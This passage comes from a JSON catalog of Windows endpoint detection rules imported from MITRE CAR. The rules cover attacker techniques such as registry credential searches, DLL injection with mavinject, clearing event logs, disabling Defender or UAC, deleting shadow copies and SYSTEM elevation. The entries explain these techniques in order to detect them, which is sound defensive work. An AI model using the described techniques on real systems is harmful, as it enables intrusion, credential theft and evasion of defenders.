"[LoLBAS](https://lolbas-project.github.io/) are binaries and scripts that are built in to Windows, frequently are signed by Microsoft, and may be used by an attacker. Some LoLBAS are used very rarely and it might be possible to alert every time they're used (this would depend on your environment), but many others are very common and can't be simply alerted on.\n\nThis analytic takes all instances of LoLBAS execution and then looks for instances of command lines that are not normal in the environment. This can detect attackers (which will tend to need the binaries for something different than normal usage) but will also tend to have false positives.\n\nThe analytic needs to be tuned. The `1.5` in the query is the number of standard deviations away to look. It can be tuned up to filter out more noise and tuned down to get more results. This means it is probably best as a hunting analytic when you have analysts looking at the screen and able to tune the analytic up and down, because the threshold may not be stable for very long.\n\nNote - this analytic is related to [CAR-2013-04-002](/analytics/CAR-2013-04-002), but differs by looking for a different set of binaries and also looking at standard deviation across command lines of these binaries instead of their execution within a short time window.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1012", "T1112", "T1547", "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-05-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-05-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-05-003.yaml" } }, { "id": "mitre-car-car-2020-08-001", "type": "detection", "name": "NTFS Alternate Data Stream Execution - System Utilities", "description": "NTFS Alternate Data Streams (ADSs) may be used by adversaries as a means of evading security tools by storing malicious data or binaries in file attribute metadata. ADSs are also powerful because they can be directly executed by various Windows tools; accordingly, this analytic looks at common ways of executing ADSs using system utilities such as powershell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-08-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-08-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-08-001.yaml" } }, { "id": "mitre-car-car-2020-08-002", "type": "detection", "name": "NTFS Alternate Data Stream Execution - LOLBAS", "description": "NTFS Alternate Data Streams (ADSs) may be used by adversaries as a means of evading security tools by storing malicious data or binaries in file attribute metadata. ADSs are also powerful because their contents can be directly executed by various Windows tools; accordingly, this analytic looks at common ways of executing ADSs using Living off the Land Binaries and Scripts (LOLBAS).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-08-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-08-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-08-002.yaml" } }, { "id": "mitre-car-car-2020-09-001", "type": "detection", "name": "Scheduled Task - FileAccess", "description": "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host. Task Scheduler stores tasks as files in two locations - C:\\Windows\\Tasks (legacy) or C:\\Windows\\System32\\Tasks. Accordingly, this analytic looks for the creation of task files in these two locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-001.yaml" } }, { "id": "mitre-car-car-2020-09-002", "type": "detection", "name": "Component Object Model Hijacking", "description": "Adversaries may establish persistence or escalate privileges by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. This is typically done by replacing COM object registry entries under the HKEY_CURRENT_USER\\Software\\Classes\\CLSID or HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID keys. Accordingly, this analytic looks for any changes under these keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-002.yaml" } }, { "id": "mitre-car-car-2020-09-003", "type": "detection", "name": "Indicator Blocking - Driver Unloaded", "description": "Adversaries may attempt to evade system defenses by unloading minifilter drivers used by host-based sensors such as Sysmon through the use of the fltmc command-line utility. Accordingly, this analytic looks for command-line invocations of this utility when used to unload minifilter drivers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-003.yaml" } }, { "id": "mitre-car-car-2020-09-004", "type": "detection", "name": "Credentials in Files & Registry", "description": "Adversaries may search the Windows Registry on compromised systems for insecurely stored credentials for credential access. This can be accomplished using the query functionality of the reg.exe system utility, by looking for keys and values that contain strings such as \"password\". In addition, adversaries may use toolkits such as [PowerSploit](https://powersploit.readthedocs.io/en/latest/) in order to dump credentials from various applications such as IIS.Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several powersploit modules with similar functionality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-004.yaml" } }, { "id": "mitre-car-car-2020-09-005", "type": "detection", "name": "AppInit DLLs", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys `HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows` or `HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows` are loaded by user32.dll into every process that loads user32.dll. These values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes. Accordingly, this analytic looks for modifications to these registry keys that may be indicative of this type of abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-005.yaml" } }, { "id": "mitre-car-car-2020-11-001", "type": "detection", "name": "Boot or Logon Initialization Scripts", "description": "Adversaries may schedule software to run whenever a user logs into the system; this is done to establish persistence and sometimes for lateral movement. This trigger is established through the registry key HKEY_CURRENT_USER\\Environment*UserInitMprLogonScript*. This signature looks edits to existing keys or creation of new keys in that path. Users purposefully adding benign scripts to this path will result in false positives; that case is rare, however. There are other ways of running a script at startup or login that are not covered in this signature. Note that this signature overlaps with the Windows Sysinternals Autoruns tool, which would also show changes to this registry path.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1037" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-001.yaml" } }, { "id": "mitre-car-car-2020-11-002", "type": "detection", "name": "Local Network Sniffing", "description": "Adversaries may use a variety of tools to gain visibility on the current status of things on the network: which processes are listening on which ports, which services are running on other hosts, etc. This analytic looks for the names of the most common network sniffing tools. While this may be noisy on networks where sysadmins are using any of these tools on a regular basis, in most networks their use is noteworthy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-002.yaml" } }, { "id": "mitre-car-car-2020-11-003", "type": "detection", "name": "DLL Injection with Mavinject", "description": "Injecting a malicious DLL into a process is a common adversary TTP. Although the ways of doing this are numerous, mavinject.exe is a commonly used tool for doing so because it roles up many of the necessary steps into one, and is available within Windows. Attackers may rename the executable, so we also use the common argument \"INJECTRUNNING\" as a related signature here. Whitelisting certain applications may be necessary to reduce noise for this analytic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-003.yaml" } }, { "id": "mitre-car-car-2020-11-004", "type": "detection", "name": "Processes Started From Irregular Parent", "description": "Adversaries may start legitimate processes and then use their memory space to run malicious code. This analytic looks for common Windows processes that have been abused this way in the past; when the processes are started for this purpose they may not have the standard parent that we would expect. This list is not exhaustive, and it is possible for cyber actors to avoid this discepency. These signatures only work if Sysmon reports the parent process, which may not always be the case if the parent dies before sysmon processes the event.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-004.yaml" } }, { "id": "mitre-car-car-2020-11-005", "type": "detection", "name": "Clear Powershell Console Command History", "description": "Adversaries may attempt to conceal their tracks by deleting the history of commands run within the Powershell console, or turning off history saving to begin with. This analytic looks for several commands that would do this. This does not capture the event if it is done within the console itself; only commandline-based commands are detected. Note that the command to remove the history file directly may very a bit if the history file is not saved in the default path on a particular system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-005.yaml" } }, { "id": "mitre-car-car-2020-11-006", "type": "detection", "name": "Local Permission Group Discovery", "description": "Cyber actors frequently enumerate local or domain permissions groups. The net utility is usually used for this purpose. This analytic looks for any instances of net.exe, which is not normally used for benign purposes, although system administrator actions may trigger false positives.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1069" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-006.yaml" } }, { "id": "mitre-car-car-2020-11-007", "type": "detection", "name": "Network Share Connection Removal", "description": "Adversaries may use network shares to exfliltrate date; they will then remove the shares to cover their tracks. This analytic looks for the removal of network shares via commandline, which is otherwise a rare event.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-007.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-007", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-007.yaml" } }, { "id": "mitre-car-car-2020-11-008", "type": "detection", "name": "MSBuild and msxsl", "description": "Trusted developer utilities such as MSBuild may be leveraged to run malicious code with elevated privileges. This analytic looks for any instances of msbuild.exe, which will execute any C# code placed within a given XML document; and msxsl.exe, which processes xsl transformation specifications for XML files and will execute a variaty of scripting languages contained within the XSL file. Both of these executables are rarely used outside of Visual Studio.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-008.yaml" } }, { "id": "mitre-car-car-2020-11-009", "type": "detection", "name": "Compiled HTML Access", "description": "Adversaries may hide malicious code in .chm compiled HTML files. When these files are read, Windows uses the HTML help executable named hh.exe, which is the signature for this analytic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-009.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-009", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-009.yaml" } }, { "id": "mitre-car-car-2020-11-010", "type": "detection", "name": "CMSTP", "description": "CMSTP.exe is the Microsoft Connection Manager Profile Installer, which can be leveraged to setup listeners that will receive and install malware from remote sources in trusted fashion.\nWhen CMSTP.exe is seen in combination with an external connection, it is a good indication of this TTP.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-010.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-010", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-010.yaml" } }, { "id": "mitre-car-car-2020-11-011", "type": "detection", "name": "Registry Edit from Screensaver", "description": "Adversaries may use screensaver files to run malicious code. This analytic triggers on suspicious edits to the screensaver registry keys, which dictate which .scr file the screensaver runs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-011.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-011", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-011.yaml" } }, { "id": "mitre-car-car-2021-01-001", "type": "detection", "name": "Identifying Port Scanning Activity", "description": "After compromising an initial machine, adversaries commonly attempt to laterally move across the network. The first step to attempt the lateral movement often involves conducting host identification, port and service scans on the internal network via the compromised machine using tools such as Nmap, Cobalt Strike, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-001.yaml" } }, { "id": "mitre-car-car-2021-01-002", "type": "detection", "name": "Unusually Long Command Line Strings", "description": "Often, after a threat actor gains access to a system, they will attempt to run some kind of malware to further infect the victim machine. These malware often have long command line strings, which could be a possible indicator of attack. Here, we use sysmon and Splunk to first find the average command string length and search for command strings that stretch over multiple lines, thus identifying anomalies and possibly malicious commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-002.yaml" } }, { "id": "mitre-car-car-2021-01-003", "type": "detection", "name": "Clearing Windows Logs with Wevtutil", "description": "In an attempt to clear traces after compromising a machine, threat actors often try to clear Windows Event logs. This is often done using \u201cwevtutil\u201d, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-003.yaml" } }, { "id": "mitre-car-car-2021-01-004", "type": "detection", "name": "Unusual Child Process for Spoolsv.Exe or Connhost.Exe", "description": "After gaining initial access to a system, threat actors attempt to escalate privileges as they may be operating within a lower privileged process which does not allow them to access protected information or carry out tasks which require higher permissions. A common way of escalating privileges in a system is by externally invoking and exploiting spoolsv or connhost executables, both of which are legitimate Windows applications. This query searches for an invocation of either of these executables by a user, thus alerting us of any potentially malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-004.yaml" } }, { "id": "mitre-car-car-2021-01-006", "type": "detection", "name": "Unusual Child Process spawned using DDE exploit", "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1559" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-006.yaml" } }, { "id": "mitre-car-car-2021-01-007", "type": "detection", "name": "Detecting Tampering of Windows Defender Command Prompt", "description": "In an attempt to avoid detection after compromising a machine, threat actors often try to disable Windows Defender. This is often done using \u201csc\u201d [service control], a legitimate tool provided by Microsoft for managing services. This action interferes with event detection and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-007.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-007", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-007.yaml" } }, { "id": "mitre-car-car-2021-01-008", "type": "detection", "name": "Disable UAC", "description": "Threat actors often, after compromising a machine, try to disable User Access Control (UAC) to escalate privileges. This is often done by changing the registry key for system policies using \u201creg.exe\u201d, a legitimate tool provided by Microsoft for modifying the registry via command prompt or scripts. This action interferes with UAC and may enable a threat actor to escalate privileges on the compromised system, thereby allowing further exploitation of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-008.yaml" } }, { "id": "mitre-car-car-2021-01-009", "type": "detection", "name": "Detecting Shadow Copy Deletion or Resize", "description": "After compromising a network of systems, threat actors often try to delete/resize Shadow Copy in an attempt to prevent administrators from restoring the systems to versions present before the attack. This is often done via vssadmin, a legitimate Windows tool to interact with shadow copies. This action is often employed by ransomware, may lead to a failure in recovering systems after an attack. The pseudo code detection focus on Windows Security and Sysmon process creation (4688 and 1). The use of wmic to delete shadow copy generates WMI-Activity Operationnal 5857 event and could generate 5858 (if the operation fails). These 2 EventIDs could be interesting when attackers use wmic without process creation and/or for forensics.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-009.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-009", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-009.yaml" } }, { "id": "mitre-car-car-2021-02-001", "type": "detection", "name": "Webshell-Indicative Process Tree", "description": "A web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gatway in a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1505" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-02-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-02-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-02-001.yaml" } }, { "id": "mitre-car-car-2021-02-002", "type": "detection", "name": "Get System Elevation", "description": "Cyber actors frequently escalate to the SYSTEM account after gaining entry to a Windows host, to enable them to carry out various attacks more effectively. Tools such as Meterpreter, Cobalt Strike, and Empire carry out automated steps to \"Get System\", which is the same as switching over to the System user account. Most of these tools utilize multiple techniques to try and attain SYSTEM: in the first technique, they create a named pipe and connects an instance of cmd.exe to it, which allows them to impersonate the security context of cmd.exe, which is SYSTEM. In the second technique, a malicious DLL is injected into a process that is running as SYSTEM; the injected DLL steals the SYSTEM token and applies it where necessary to escalate privileges. This analytic looks for both of these techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-02-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-02-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-02-002.yaml" } }, { "id": "mitre-car-car-2021-04-001", "type": "detection", "name": "Common Windows Process Masquerading", "description": "[Masquerading (T1036)](https://attack.mitre.org/techniques/T1036/) is defined by ATT&CK as follows:\n\n\"Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\"\n\nMalware authors often use this technique to hide malicious executables behind legitimate Windows executable names (e.g. `lsass.exe`, `svchost.exe`, etc).\n\nThere are several sub-techniques, but this analytic focuses on [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005/) only.\n\n**Analytic Methodology**\n\nWith process monitoring, hunt for processes matching these criteria:\n\n* process name is `svchost.exe`, `smss.exe`, `wininit.exe`, `taskhost.exe`, etc.\n* process path is not `C:\\Windows\\System32\\` or `C:\\Windows\\SysWow64\\`\n\nExamples (true positive):\n\n`C:\\Users\\administrator\\svchost.exe`\n\nTo make sure the rule doesn't miss cases where the executable would be started from a sub-folder of these locations, the entire path is checked for the process path. The below example should be considered as suspicious:\n\n`C:\\Windows\\System32\\srv\\svchost.exe`", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-04-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-04-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-04-001.yaml" } }, { "id": "mitre-car-car-2021-05-001", "type": "detection", "name": "Attempt To Add Certificate To Untrusted Store", "description": "Adversaries may add their own root certificate to the certificate store, to cause the web browser to trust that certificate and not display a security warning when it encounters the previously unseen certificate. This action may be the precursor to malicious activity.", "version": "1.0.0", "author": 